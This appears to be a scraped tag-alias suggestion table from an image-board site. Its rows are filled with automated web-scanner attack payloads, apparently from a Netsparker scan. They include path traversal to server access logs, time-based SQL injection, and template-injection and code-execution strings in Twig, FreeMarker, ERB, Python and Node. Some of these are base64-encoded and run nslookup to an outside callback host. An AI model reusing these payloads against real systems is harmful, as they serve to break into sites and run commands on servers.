An example of how to use this: (Evangelion is the tag and Neon_Genesis_Evangelion is the alias.)
| Tag: (What you search for...) | Alias: (What it should be...) | Reason: |
|---|
| 3 | /../../../../../../../../../../etc/httpd/logs/access.log | |
| 3 | print_localtime()*0+0xFFF9999-1078 | |
| 3 | /../../../../../../../../../../var/log/nginx/access.log | |
| 3 | {{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("nslookup_rsyk_l7uvxsexrhgo1mricmwecngwviv5gm1cvcy"~"hww.r87.me")}} | |
| 3 | <scRipt>ns(0x0095A0)</scRipt> | |
| 3 | syscolumns_WHERE_2>3;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x--_/*_bd088452-f22d-4f74-983e-b665e59b4e79_*/ | |
| 3 | eval('print_localtime()*0+0xFFF9999-8392') | |
| 3 | /../../../../../../../../../../opt/lampp/logs/access_log | |
| 3 | */netsparker(0x0095AF);/* | |
| 3 | <%=_"#{(require'base64';%x(#{Base64.urlsafe_decode64('bnNsb29rdXAgcnN5a19sN3V2eHZkY3Fhc2Jhb2c5Mmp3c3UtcnFsaG1hajhvcHlndXd6aS5yODcubWU=')})).to_s}"_%> | |
| 3 | 1_+_((SELECT_1_FROM_(SELECT_SLEEP(25))A))/*'XOR(((SELECT_1_FROM_(SELECT_SLEEP(25))A)))OR'|"XOR(((SELECT_1_FROM_(SELECT_SLEEP(25))A)))OR"*/_/*_84bae883-9e5c-4cb1-9a16-e59a58e0c49c_*/ | |
| 3 | '+print_localtime()*0+0xFFF9999-77774+' | |
| 3 | /../../../../../../../../../../var/log/lighttpd/access.log | |
| 3 | '+netsparker(0x0095B5)+' | |
| 3 | <#assign_ex="freemarker.template.utility.Execute"?new()>${_ex("bash_-c_{eval,$({tr,/+,_-}<<<bnNsb29rdXAgcnN5a19sN3V2eDBnN3dxdHNlZnlwcXU1cWF0OHBlZG56eDVkM2x4ZHBvMC5yODcubWU=|{base64,--decode})}")_} | |
| 3 | -1_AND_((SELECT_1_FROM_(SELECT_2)a_WHERE_1=sleep(25)))--_1_/*_c38dfea3-9e06-4f00-be32-6c074578616b_*/ | |
| 3 | "+print_localtime()*0+0xFFF9999-54173+" | |
| 3 | ((select_sleep(25)))a--_1_/*_8f93091e-31d1-4482-bd34-94a8095f9d46_*/ | |
| 3 | "+netsparker(0x0095C1)+" | |
| 3 | /../../../../../../../../../../AppServ/Apache24/logs/access.log | |
| 3 | arguments[1].end(require('child_process').execSync('expr_268409241_-_90715')) | |
| 3 | <#assign_ex="freemarker.template.utility.Execute"?new()>${_ex("cmd.exe_/c_nslookup_rsyk_l7uvxr0xdhor-itgmm5yuyrn_6phjacfwrj"+"oas.r87.me")_} | |
| 3 | (select_dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)),25)_from_dual)_/*_80eca9a7-331c-46c9-9d15-a53d207c3625_*/ | |
| 3 | arguments[1].end(require('child_process').execSync('set_/A_268409241_-_43525')) | |
| 3 | \';netsparker(0x0095CD);/// | |
| 3 | ../../../../../../../../../../xampp/apache/logs/access.log | |
| 3 | require_'resolv';Resolv.getaddress_("rsyk_l7uvxokko54strlgdmoo6xe9q1zd4j33mcs".concat_"bom.r87.me") | |
| 3 | %{#context["com.opensymphony.xwork2.dispatcher.HttpServletResponse"].addHeader("a",268409241-90020)} | |
| 3 | 1'_||_(select_dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)),25)_from_dual)_||_'_/*_6b04faf6-53c3-4dd1-bc24-9ffaaee0844d_*/ | |
| 3 | ',netsparker(0x0095D5),' | |
| 3 | /../../../../../../../../../../var/log/apache/access.log | |
| 3 | p_"#{0xFFF9999.to_i-`echo_16984`.to_i}" | |
| 3 | __import__('os').popen(__import__('base64').urlsafe_b64decode('bnNsb29rdXAgcnN5a19sN3V2eC1ycjN0X2tsYW11cGp6cm90cHc4eWF2cWQ5Y3R4Zjg5dS5yODcubWU=')).read() | |
| 3 | 1_+_(select_dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)),25)_from_dual)_+_1_/*_1c46a048-7609-472d-94bc-7f5a27f84ea1_*/ | |
| 3 | netsparker(0x0095DB) | |
| 3 | 1';SELECT_pg_sleep(25)--_/*_c94cfbc8-586e-41c1-8864-7df0d52a6009_*/ | |
| 3 | __import__('os').popen(('expr_268409241_-_{0}').format('72041')).read() | |
| 3 | netsparker(0x0095E8); | |
| 3 | 1;SELECT_pg_sleep(25)--_/*_c2d506a2-6e64-45b2-8d39-d54a3f8726a9_*/ | |
| 3 | __import__('os').popen(('SET_/A_268409241_-_{0}').format('39579')).read() | |